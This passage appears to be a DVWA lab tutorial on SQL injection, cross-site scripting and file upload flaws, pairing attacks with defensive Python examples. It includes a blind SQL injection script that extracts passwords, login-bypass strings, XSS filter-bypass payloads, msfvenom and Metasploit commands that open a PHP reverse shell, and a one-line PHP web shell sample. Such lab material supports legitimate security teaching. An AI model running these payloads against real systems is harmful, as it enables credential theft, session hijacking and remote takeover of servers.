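    """String concatenation: the user's input becomes part of the SQL text."""
    sql = f"SELECT author, title, year FROM books WHERE publisher = '{publisher}'"
    return conn.execute(sql).fetchall()


def search_safe(publisher: str) -> list:
    """Parameterised: the value travels separately and is never parsed as SQL."""
    sql = "SELECT author, title, year FROM books WHERE publisher = ?"
    return conn.execute(sql, (publisher,)).fetchall()


def login_vulnerable(username: str, password: str) -> bool:
    sql = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"
    return conn.execute(sql).fetchone() is not None


def login_safe(username: str, password: str) -> bool:
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def page_shows_results(publisher: str) -> bool:
    """All a blind page reveals: did the query match anything? A query that
    errors out (e.g. an unbalanced quote) looks the same as no results."""
    try:
        return len(search_vulnerable(publisher)) > 0
    except sqlite3.Error:
        return False


def blind_extract(username: str, max_len: int = 32) -> str:
    """Recover users.password for `username` through the search box by
    asking one true/false question per candidate character."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    found = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            probe = (f"Iqbal' AND substr((SELECT password FROM users "
                     f"WHERE username='{username}'),{pos},1) = '{ch}")
            if page_shows_results(probe):
                found += ch
                break
        else:
            break                       # no character matched: end of string
    return found


if __name__ == "__main__":
    print(search_vulnerable("Iqbal' OR 1=1--"))          # whole catalogue
    print(search_safe("Iqbal' OR 1=1--"))                # nothing: literal match
    print(login_vulnerable("admin'--", "wrong"), login_safe("admin'--", "wrong"))
    print(blind_extract("admin"))
```

Each probe ends with an unclosed quote that the application's own trailing quote completes, exactly as in Case 4; with a 94-character alphabet the extraction costs at most 94 requests per character, which is why sqlmap uses a binary search on the character code instead.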
XSS

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. The end user's browser has no way to know that the script should not be trusted, and will execute it. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site

Low Difficulty
• You can submit the following script, and whenever any user visits the page they will get an alert (the alert is only the proof; the same position runs any JavaScript, for instance one that sends document.cookie to the attacker)

<script>alert("testing")</script>

Medium Difficulty
• htmlspecialchars() converts the characters that have a special meaning in HTML (&, ", < and >, plus ' when called with the ENT_QUOTES flag) into their HTML entity encoding, so they are shown as text rather than parsed as markup when reflected back in the browser
• str_replace() is used on the other field instead: here it replaces every occurrence of the literal string <script> with an empty string, and nothing else
• We also need to increase the input field length, as the form restricts the field length to 100 with a maxlength attribute. Just inspect the element, raise the limit and submit the following script
• Because str_replace() is case-sensitive and runs only once, we can use <Script>, <scRiPt> or <ScRiPt> in place of <script>, or nest the tag so that removing the inner copy leaves a valid outer one: <scr<script>ipt>
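The two server-side defences from the medium-level slides, modelled in Python as an added example (not DVWA's code): a str_replace()-style blacklist of the literal <script> tag next to html.escape(), which does what htmlspecialchars() does. The payloads are constructed, and the "does it execute" check is a simplified regex for a surviving script tag or inline event handler rather than a real browser.

```python
"""Blacklist versus output encoding for reflected XSS. Added example, not
DVWA's code; payloads are constructed and executes_script() is a simplified
stand-in for a browser."""
import html
import re

# A surviving <script ...> tag, or a tag carrying an on*= event handler.
DANGEROUS = re.compile(r"<script\b|<\w+[^>]*\bon\w+\s*=", re.IGNORECASE)


def filter_medium(name: str) -> str:
    """str_replace('<script>', '', $name): exact, case-sensitive, one pass."""
    return name.replace("<script>", "")


def filter_escape(name: str) -> str:
    """htmlspecialchars($name, ENT_QUOTES): markup characters become entities."""
    return html.escape(name, quote=True)


def render(filter_fn, name: str) -> str:
    """The reflected page: 'Hello <name>' with the chosen filter applied."""
    return f"<pre>Hello {filter_fn(name)}</pre>"


def executes_script(rendered: str) -> bool:
    """Would a browser find something to execute in this HTML? Tag names are
    matched case-insensitively because HTML treats them that way."""
    return DANGEROUS.search(rendered) is not None


PAYLOADS = [
    "<script>alert(1)</script>",          # removed by the blacklist
    "<Script>alert(1)</Script>",          # case bypass
    "<scr<script>ipt>alert(1)</script>",  # nesting bypass: one pass leaves <script>
    "<img src=x onerror=alert(1)>",       # no script tag to remove at all
]


def survey(filter_fn) -> dict:
    """Map each payload to whether it still executes after the filter."""
    return {p: executes_script(render(filter_fn, p)) for p in PAYLOADS}


if __name__ == "__main__":
    for name, fn in (("str_replace", filter_medium), ("htmlspecialchars", filter_escape)):
        print(name, survey(fn))
```

Only the first payload is stopped by the blacklist; encoding the output stops all four because nothing the user typed is parsed as markup any more, which is the general lesson: encode for the context you write into rather than hunting for bad strings.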
File Upload

A file upload vulnerability is a weakness in web applications that allows an attacker to upload malicious files to the server. If the upload directory sits inside the web root and the server executes the uploaded file type (a .php file under Apache with PHP, for instance), the file runs on the server, potentially giving the attacker unauthorized access to sensitive information, the ability to execute arbitrary code, and the ability to launch further attacks. The vulnerability typically arises when the application does not properly validate or sanitize the file being uploaded, allowing the attacker to upload a file with a malicious payload.

Low-difficulty DVWA File Upload

Step- 1
• Go to DVWA security settings and set the difficulty to low

Step- 2
• Create a msfvenom payload on your Kali machine (LHOST is the address your listener will be reachable on)

msfvenom -p php/meterpreter/reverse_tcp LHOST=[Link] LPORT=4444 -f raw > [Link]

Step- 3
• Now run Metasploit and start a multi/handler to listen for PHP reverse sessions, with the same payload, LHOST and LPORT as the file

>use exploit/multi/handler
>set payload php/meterpreter/reverse_tcp
>set LHOST [Link]
>set LPORT 4444
>run

Step- 4
• Now upload the file. The file will be uploaded without any restriction, and the page shows the path it was stored under. Open that path in the browser

Step- 5
• On opening the file, the PHP runs on the server and connects back, and we get the reverse shell (a meterpreter session) in the handler
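What a server-side check that would have stopped the upload above looks like, as an added Python example (not DVWA's code): an extension allowlist, the content sniffed from magic bytes instead of the client's Content-Type, a random server-chosen name, and storage in a directory that is not served directly. The sample uploads are constructed byte strings and the storage directory is a temporary one.

```python
"""Server-side upload validation. Added example, not DVWA's code; the
uploads are constructed byte strings and the directory is temporary."""
import os
import secrets
import tempfile

# Allowed extension -> magic bytes the file must start with.
ALLOWED = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff", ".gif": b"GIF8"}
ALLOWED_TYPES = {"image/png", "image/jpeg", "image/gif"}
MAX_BYTES = 2 * 1024 * 1024


class UploadRejected(Exception):
    pass


def validate_upload(filename: str, content_type: str, data: bytes) -> str:
    """Return the extension to store under, or raise UploadRejected."""
    if len(data) > MAX_BYTES:
        raise UploadRejected("too large")
    base = os.path.basename(filename)           # drop any path the client sent
    _, ext = os.path.splitext(base.lower())
    if ext not in ALLOWED:
        raise UploadRejected(f"extension {ext!r} not allowed")
    # shell.php.png ends in .png, so the bytes must look like a PNG as well;
    # the client's Content-Type is checked last because it is attacker-chosen.
    if not data.startswith(ALLOWED[ext]):
        raise UploadRejected("content does not match extension")
    if content_type not in ALLOWED_TYPES:
        raise UploadRejected("unexpected content type")
    return ext


def store_upload(storage_dir: str, filename: str, content_type: str, data: bytes) -> str:
    """Validate, then write under a random name. storage_dir is meant to sit
    outside the web root and be served through a download handler, so even
    an image/PHP polyglot that passes the checks is never executed."""
    ext = validate_upload(filename, content_type, data)
    name = secrets.token_hex(16) + ext
    with open(os.path.join(storage_dir, name), "wb") as fh:
        fh.write(data)
    return name


# Constructed sample uploads.
PHP_SHELL = b"<?php /* msfvenom-style reverse shell would go here */ ?>"
POLYGLOT_PNG = b"\x89PNG\r\n\x1a\n" + b"<?php system($_GET['c']); ?>"
PLAIN_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64


def demo() -> dict:
    storage = tempfile.mkdtemp(prefix="uploads_")
    results = {}
    for fname, ctype, data in [("shell.php", "application/x-php", PHP_SHELL),
                               ("shell.php", "image/png", PHP_SHELL),
                               ("shell.php.png", "image/png", PHP_SHELL),
                               ("photo.png", "image/png", POLYGLOT_PNG),
                               ("../../var/www/html/x.png", "image/png", PLAIN_PNG)]:
        key = fname + "|" + ctype
        try:
            results[key] = "stored as " + store_upload(storage, fname, ctype, data)
        except UploadRejected as e:
            results[key] = "rejected: " + e.args[0]
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "->", v)
```

The polyglot case is accepted on purpose: magic bytes prove only that a file starts like an image, so the protection against it is where and how the file is stored and served, not the validation alone.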
THANKS